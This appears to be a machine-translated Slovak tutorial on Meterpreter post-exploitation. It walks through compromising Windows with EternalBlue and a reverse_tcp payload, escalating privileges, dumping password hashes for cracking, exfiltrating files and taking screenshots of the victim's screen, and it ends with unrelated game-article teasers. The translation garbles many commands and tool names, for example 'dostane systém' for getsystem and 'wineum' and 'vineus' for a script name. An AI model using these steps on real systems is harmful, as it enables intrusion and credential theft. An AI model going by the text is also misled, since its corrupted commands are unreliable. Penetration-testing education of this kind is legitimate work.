metasploit

Post-exploatácia s Meterpreter

Post-exploatácia s Meterpreter
Toto je úvod do doplnku Meterpreter payload v rámci Metasploit. V tomto krátkom tutoriáli sa dozvieme, ako ho použiť na aplikáciu post exploitation v systéme Windows, keď už ste ju porušili pomocou exploitu Eternalblue. Obmedzíme sa na prístup k systému Windows a jeho preskúmanie a všetko, čo sa chystáme zamerať na prístup k informáciám a prihlasovacím údajom používateľa.

Úvod do prístroja Meterpreter

Meterpreter je užitočné zaťaženie útoku v rámci Metasploit, ktoré umožňuje páchateľovi ovládať a prechádzať počítačom obete cez príkazový shell. Môže sa ukázať ako veľmi všestranný nástroj, pokiaľ ide o penetračné testovanie.  Jedná sa o post-exploitačný nástroj, ktorý je založený na injektovaní DLL v pamäti, čo znamená, že injektovanú DLL dostane do chodu vytvorením nového procesu, ktorý vyžaduje, aby systém spustil injektovanú DLL. Môže vám poskytnúť prístup k neviditeľnému príkazovému shellu na stroji obete, čo vám umožní spustiť spustiteľné súbory a profilové siete.

Pôvodne bol napísaný pre Metasploit 2.x a je upgradovaný na Metasploit 3.

Budeme podrobne diskutovať o použitiach Meterpreteru, ale predtým si dajme pár slov o užitočných zaťaženiach všeobecne

Čo sú užitočné zaťaženia?

Užitočné zaťaženie v Metasploite sú moduly, čo znamená, že sú to útržky kódov v Metasploite, ktoré bežia na vzdialenom systéme, na ktorý zacieľujeme. Najskôr sa odošle exploitový modul, ktorý nainštaluje modul užitočného zaťaženia do systému. Potom užitočné zaťaženie poskytuje útočníkovi prístup (obmedzený alebo plnohodnotný, závisí od obsahu užitočného zaťaženia). Aby sme ďalej rozpracovali fungovanie užitočného zaťaženia, musíme diskutovať o jeho druhoch, ktoré sú celkom 3:

Dvojhry

Tieto užitočné zaťaženia sú úplne samostatné, čo znamená, že môžu byť rovnako základné ako kódy vrátnika, ktoré umožňujú používateľovi vstup do cieľového systému.

Stagers

Stagery sú užitočné zaťaženia, ktoré zhromažďujú aplikácie v cieľovom systéme a odosiela ich útočníkovi. Nadväzuje spojenie medzi obeťou a naším lokálnym počítačom.

Etapy

Len čo majú stupňovití členovia prístup do systému, stiahnu si moduly stupňov. Fázové moduly odstraňujú veľkostnú čiapku na merači.

Príklady stupňov by mohli byť jednoduchý shell, „ipwn“ shell pre iPhone, moduly Meterpreter, VNC Injection.

Typ užitočného zaťaženia môžete zistiť vypočítaním jeho názvu. Jednotlivé užitočné zaťaženia majú zvyčajne formát /

Vykorisťovanie pomocou spoločnosti Meterpreter

Najskôr spustite konzolu msf zadaním nasledujúceho príkazu terminálu v okne terminálu Kali.

$ sudo msfconsole

Ako stager používame reverse_tcp a ako javisko Meterpreter.

Začneme nastavením využitia Večnej modrej. Vyberte (ms17_010_eternalblue), potom nastavte windows / x64 / meterpreter / reverse_tcp ako vybrané užitočné zaťaženie

Ďalej nakonfigurujte nastavenia zneužitia a potom spustite príkaz zneužitia pomocou príkazu exploit:

$ nastaviť užitočné zaťaženie windows / x64 / meterpreter / reverse_tcp
$ nastavený prírastok 192.168.198.136
$ využívať

The Eternalblue využiť bol úspešne aktivovaný.

Následné vykorisťovanie

Počas post-exploatácie pristupujeme k už narušenému systému a manipulujeme s ním.

Teraz, keď máme prístup do systému, môžeme urobiť veľa vecí, ale ako už bolo spomenuté vyššie, musíme sa naďalej sústrediť hlavne na sťahovanie informácií a získavanie poverení používateľov tu

Správa prístupových oprávnení:

V závislosti od použitého modulu užitočného zaťaženia a využitého potenciálu sa môžete stretnúť s určitými obmedzeniami prístupu, ktoré vážne ochromia vaše schopnosti manévrovať so strojom obete. Tento problém môžete obísť s eskaláciou privilégií odstránením hesiel a neoprávnenou úpravou registrov. Môžete tiež eskalovať privilégiá pomocou príkazu get system od Meterpreter.

$ dostane systém
$ getuid

Prenos súborov s Meterpreter

S programom Meterpreter môžete stiahnuť súbor pomocou príkazu $ download-.

$ download / windows / system32 / drivers / etc / hosts

Podobne môžete nahrať informácie aj do zariadenia pomocou príkazu $ upload-

Extrahovanie poverení používateľa:

Na extrahovanie informácií o používateľských účtoch použite kódový skript credential_collector alebo použite modul postu výpisu hash s podobným účinkom.

Na získanie údajov budeme používať modul hash dump post. Zadajte nasledujúci príkaz msf.

$ spustiť príspevok / windows / zhromaždiť / hashdump

Ako vidíme, získali sme účty Coen, Guest a Admin. LM hash (admin) a NTLM (guest) hash sa týka prázdnych hesiel, zatiaľ čo Coen hash je heslo, ktoré budete musieť prelomiť. Môžete to urobiť pomocou crackera na heslo.

Automatizácia škrabania systému

Zhromažďovanie informácií pomocou jednotlivých vstupných príkazov, ktoré musíte neustále kŕmiť príkazovým shellom, môže byť namáhavé. Pohodlne môžete tento proces do istej miery automatizovať pomocou programu vínové písmo. Skript zhromažďuje informácie od obete a sťahuje údaje do nášho lokálneho počítača. Dozviete sa, kam sa výstup ukladá, ako vidíte v štvrtom riadku zhora:

$ run wineum

Majte na pamäti, že cesta, kde je uložený výstup do každého príkazu, sa môže líšiť od cesty zobrazenej tu.

Umožňuje trochu viac sa pokaziť

Vykonávanie súborov

Akýkoľvek súbor v systéme môžete spustiť pomocou príkazu: execute -f . Patria sem spustiteľné súbory aj programy s viacerými podpornými súbormi. Napríklad ak chcete spustiť zabudovanú aplikáciu kalkulačky v systéme Windows os, zadajte príkaz exec -f calc.exe

Robenie snímok obrazovky

Môžete tiež snímať snímky obrazovky z pohľadu používateľa. Stačí napísať snímku obrazovky do príkazového riadku programu Meterpreter a zobrazí sa snímka obrazovky v systéme.

$ vykonať -f kal.exe
$ screenshot

Záver:

Toto bolo krátke predstavenie pluginu Meterpreter v rámci Metasploit spolu s krátkym sprievodcom predstavujúcim jeho najzákladnejšie použitie. Naučili sme sa tu, ako môžeme narušiť systém Windows OS pomocou Eternalblue zneužiť na získanie prístupu, potom pomocou programu Meterpreter eskalovať privilégiá, zbierať informácie manuálne a automatizovaným príkazom vineus. Tiež sme sa naučili, ako spúšťať súbory na stroji obete.

Meterpreter môže slúžiť ako významný prostriedok na zisťovanie zraniteľnosti napriek tomu, že je konglomerátom základných nástrojov v rámci Metasploit.

Hry Vulkan pre používateľov systému Linux
Vulkan pre používateľov systému Linux
S každou novou generáciou grafických kariet vidíme, že vývojári hier posúvajú hranice grafickej vernosti a prichádzajú o krok bližšie k fotorealizmu. ...
Hry OpenTTD vs Simutrans
OpenTTD vs Simutrans
Vytvorenie vlastnej simulácie dopravy môže byť zábavné, relaxačné a mimoriadne lákavé. Preto sa musíte uistiť, že vyskúšate čo najviac hier, aby ste n...
Hry Výukový program OpenTTD
Výukový program OpenTTD
OpenTTD je jednou z najpopulárnejších obchodných simulačných hier. V tejto hre musíte vytvoriť úžasné dopravné podnikanie. Začnete však na začiatku ok...